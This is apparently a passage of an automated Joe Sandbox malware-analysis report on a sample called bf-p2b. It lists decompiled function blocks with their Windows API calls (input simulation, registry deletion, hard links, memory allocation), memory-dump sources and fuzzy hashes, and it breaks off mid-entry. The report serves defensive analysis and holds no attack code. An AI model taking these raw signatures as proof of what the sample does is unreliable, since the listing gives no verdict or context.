                          • Instruction ID: d735da7ed5fd96e267ea5d163b4a6d45ecd4182a7b5a13e1e68ffe95cc613fb8
                          • Opcode Fuzzy Hash: f938473b66c87a0a5f52d0acb223aec1107d9d9f732444c15a924d7c3bf9d96d
                          • Instruction Fuzzy Hash: BAD0A7344003129FD7216F31E80C79237D4EF24701B80549AE855E31B0DBB0C4C0C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B1E6D9,0000000C,00B1E55B,00B9DC28,?,?), ref: 00B1E6F1
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00B1E703
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsWow64Process$kernel32.dll
                          • API String ID: 2574300362-3024904723
                          • Opcode ID: 4d70899e0bae29aef3b6e5d910f783b20d7c27b0e710b975920c0b19927330f6
                          • Instruction ID: 9e25dc8d2655ad047555b4ac58d6995e09ebb74e23a2e1f722b8ad08134ed35a
                          • Opcode Fuzzy Hash: 4d70899e0bae29aef3b6e5d910f783b20d7c27b0e710b975920c0b19927330f6
                          • Instruction Fuzzy Hash: 76D05234400312ABE7243B22A88CB933BE8AF05700B4045AAE8A5A22E0DAB0D880CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00B63AC2,?,00B629F5), ref: 00B63ADA
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B63AEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: eca737a429469a35bf908148e3d9ba0d51deab0a51d7145a20f742dd86cd6fb9
                          • Instruction ID: 8a4061c51dae09e51abd27338ea6b2d468be12c7745f487957b10cb8bbbe88fe
                          • Opcode Fuzzy Hash: eca737a429469a35bf908148e3d9ba0d51deab0a51d7145a20f742dd86cd6fb9
                          • Instruction Fuzzy Hash: 32D09E705107239FD7205B65A84D79577D4AF15B15B10849EE499A26A0EFF4C880C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B5EBAF,?,00B5EAAC), ref: 00B5EBC7
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B5EBD9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: d93091739f2daa2b4ba925ee911e189bb9c1662773ebdd4088a2cf12bfa1ce6e
                          • Instruction ID: 525a8ccab78eb5767a8fb95aa4c068c08384d48b7f1ead8eeff142b6dca450a7
                          • Opcode Fuzzy Hash: d93091739f2daa2b4ba925ee911e189bb9c1662773ebdd4088a2cf12bfa1ce6e
                          • Instruction Fuzzy Hash: 9AD05E344043129BDB202F31A888B5137D4AF08706B50949AE866A22A0DFB0D880C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B03EBB,?,00B03E91,?), ref: 00B03ED3
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B03EE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          • Opcode ID: 345634a96832851fb9b2ea20efe879719878ed694c4b1e3ae80e79ce42d98858
                          • Instruction ID: d976231cbd47a8bb9db2affcc36532209c59a54826d10b5ce2d7025875406380
                          • Opcode Fuzzy Hash: 345634a96832851fb9b2ea20efe879719878ed694c4b1e3ae80e79ce42d98858
                          • Instruction Fuzzy Hash: 7CD0A7344003129FD720AF22E80C7627BD8EF04B04B00459AE486E25F0DBF0C480C720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00B56AA6), ref: 00B0AB2D
                          • _wcscmp.LIBCMT ref: 00B0AB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper_wcscmp
                          • String ID:
                          • API String ID: 820872866-0
                          • Opcode ID: ff420420f33d69989b9817ff00050121216af1f57d19818285a0f4a499e43964
                          • Instruction ID: a735a52524a0650f7314b9e8ac89d01a23b0087c2970b13e5af7fa88ba058a52
                          • Opcode Fuzzy Hash: ff420420f33d69989b9817ff00050121216af1f57d19818285a0f4a499e43964
                          • Instruction Fuzzy Hash: 43A1D27070020A9BDB15EF65E9816A9BFF1FF44300F6589EAE856972E0EB349C70C746
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharLowerBuffW.USER32(?,?), ref: 00B60D85
                          • CharLowerBuffW.USER32(?,?), ref: 00B60DC8
                            • Part of subcall function 00B60458: CharLowerBuffW.USER32(?,?,?,?), ref: 00B60478
                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B60FB2
                          • _memmove.LIBCMT ref: 00B60FC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharLower$AllocVirtual_memmove
                          • String ID:
                          • API String ID: 3659485706-0
                          • Opcode ID: fdd985afd0a151a84b49e64bd21fdf66d52047e41754047bec5b219b24e013a6
                          • Instruction ID: 36a1ae721f5c79c7d4657d5693d4fcd6c47dbc81815314eb0989f7b90c6a2c46
                          • Opcode Fuzzy Hash: fdd985afd0a151a84b49e64bd21fdf66d52047e41754047bec5b219b24e013a6
                          • Instruction Fuzzy Hash: 7AB19D716143018FC714DF28C48096ABBF4EF89714F1489AEF8899B352DB35ED45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memmove.LIBCMT ref: 00B0C419
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00B46653,?,?,00000000), ref: 00B0C495
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileRead_memmove
                          • String ID:
                          • API String ID: 1325644223-0
                          • Opcode ID: c84ebe5198f0ed5c5a0f6c1860a584b43e6cc604295b18836a3c674a01d9eae8
                          • Instruction ID: 6773aa18e4542e3078e0eea61334381ee220a2cd56f40cbaf438e6dfc1b50489
                          • Opcode Fuzzy Hash: c84ebe5198f0ed5c5a0f6c1860a584b43e6cc604295b18836a3c674a01d9eae8
                          • Instruction Fuzzy Hash: 14A18870A04619EBDB00CF69C894BADBFF0FF05300F14C6D5E869AA291D735E960DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction ID: 0893eafd9a4c88049048d4febe37fc9bdef8d9fbf9a71ff8332da59ea330f186
                          • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                          • Instruction Fuzzy Hash: C251D330A003259BDB24DFA9E8806AE77F1EF41320F2487B9F83D96AD0DB749D519B44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B6C354
                          • ScreenToClient.USER32(?,00000002), ref: 00B6C384
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00B6C3EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ClientMoveRectScreen
                          • String ID:
                          • API String ID: 3880355969-0
                          • Opcode ID: b47f700b9c2a0ed024f781314bf34570965aed4031f0a29c8f14b7f8fc23c0dd
                          • Instruction ID: f8217c278e31ffa91cb1f11edad15edacdea9c15e6794150ce0e168eb1e16c3d
                          • Opcode Fuzzy Hash: b47f700b9c2a0ed024f781314bf34570965aed4031f0a29c8f14b7f8fc23c0dd
                          • Instruction Fuzzy Hash: 0C510C71A00209EFDF10DF68C880ABE7BF6FB45360F248599E9659B291DB74ED41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B3D258
                          • __itow.LIBCMT ref: 00B3D292
                            • Part of subcall function 00B3D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B3D549
                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B3D2FB
                          • __itow.LIBCMT ref: 00B3D350
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$__itow
                          • String ID:
                          • API String ID: 3379773720-0
                          • Opcode ID: c9491222a373d559c363d240e5fcf79aa374a900f177c20b29782c899cd76131
                          • Instruction ID: ce4f4f756a3181ca5032aa51b85eacdd2fbf9b49ed01947e6a768e82a42dbe76
                          • Opcode Fuzzy Hash: c9491222a373d559c363d240e5fcf79aa374a900f177c20b29782c899cd76131
                          • Instruction Fuzzy Hash: DD416071A00209ABDF15EF54DC56BEE7BF9AF48700F1000A9FA06A3291DB749A45CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B4EF32
                          • GetLastError.KERNEL32(?,00000000), ref: 00B4EF58
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B4EF7D
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B4EFA9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: dda5a51ad5e7da51cf41e51cae1a2f05ce7c8abaa51a6adae133abc58e07c192
                          • Instruction ID: 7bf9c5865cd7f5cb4619c7eb62d6f84ba2ac5b78c013acd896e733c23985d9d1
                          • Opcode Fuzzy Hash: dda5a51ad5e7da51cf41e51cae1a2f05ce7c8abaa51a6adae133abc58e07c192
                          • Instruction Fuzzy Hash: 7B410439600611DFCB11EF15C584A5DBBE5EF99320B1980D9E856AF3A2CB30EE40DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B6B3E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          • API String ID: 634782764-0
                          • Opcode ID: 185d8dff30ddd116f3509bdd6661fb70883cf2fb1b36ed56157e2890a8f2a8d6
                          • Instruction ID: b0bed331b4e5f67240d57c1323a40e0deb177033c7da4c75c484f63276172d4b
                          • Opcode Fuzzy Hash: 185d8dff30ddd116f3509bdd6661fb70883cf2fb1b36ed56157e2890a8f2a8d6
                          • Instruction Fuzzy Hash: 07319E34640208ABEF249F58DC85FA837F5EB06350F248596FA51D73E2DB38E9809B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00B6D617
                          • GetWindowRect.USER32(?,?), ref: 00B6D68D
                          • PtInRect.USER32(?,?,00B6EB2C), ref: 00B6D69D
                          • MessageBeep.USER32(00000000), ref: 00B6D70E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: 48452121dff5ee2646c22332047ec45d2fcd25ed7173e7812dbf47e3d7e02d19
                          • Instruction ID: 31e112cc80755e9b5e4838d26ec299d7ccd9c6822ebc456ff9c88951aa42c150
                          • Opcode Fuzzy Hash: 48452121dff5ee2646c22332047ec45d2fcd25ed7173e7812dbf47e3d7e02d19
                          • Instruction Fuzzy Hash: B2416930F04119DFCB11DF98D884FA97BF5FB49314F1885AAE4199B2A1DB34E841DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00B444EE
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B4450A
                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00B4456A
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00B445C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: f5decf3ebe2a59be1fd12212a8bfc73916e550f14330ef737c3edbc99b5cdd8c
                          • Instruction ID: cf789b4a34501e3e36f692ba1423619b569dccd01881428b33585a0dee7a7624
                          • Opcode Fuzzy Hash: f5decf3ebe2a59be1fd12212a8bfc73916e550f14330ef737c3edbc99b5cdd8c
                          • Instruction Fuzzy Hash: 1C31E6719002585FEF209B649808BFEBBF5DB65314F08029AF4C1931D1CB749F64E761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B34DE8
                          • __isleadbyte_l.LIBCMT ref: 00B34E16
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B34E44
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B34E7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 1c34c95a165bb6091975e6accd3f07cac41a881be0a2900e2560fea2cc2f11db
                          • Instruction ID: 6ee7d49b9bb82b02bc8d8da59b7e7e699fbf510dd5ff7ae4849e29b033aa0153
                          • Opcode Fuzzy Hash: 1c34c95a165bb6091975e6accd3f07cac41a881be0a2900e2560fea2cc2f11db
                          • Instruction Fuzzy Hash: 5131BE31600226EFDF259F75C845BAA7BE6FF41310F2585A9E8258B1A0E730FC51DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetForegroundWindow.USER32 ref: 00B67AB6
                            • Part of subcall function 00B469C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B469E3
                            • Part of subcall function 00B469C9: GetCurrentThreadId.KERNEL32 ref: 00B469EA
                            • Part of subcall function 00B469C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B469F1
                          • GetCaretPos.USER32(?), ref: 00B67AC7
                          • ClientToScreen.USER32(00000000,?), ref: 00B67B00
                          • GetForegroundWindow.USER32 ref: 00B67B06
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
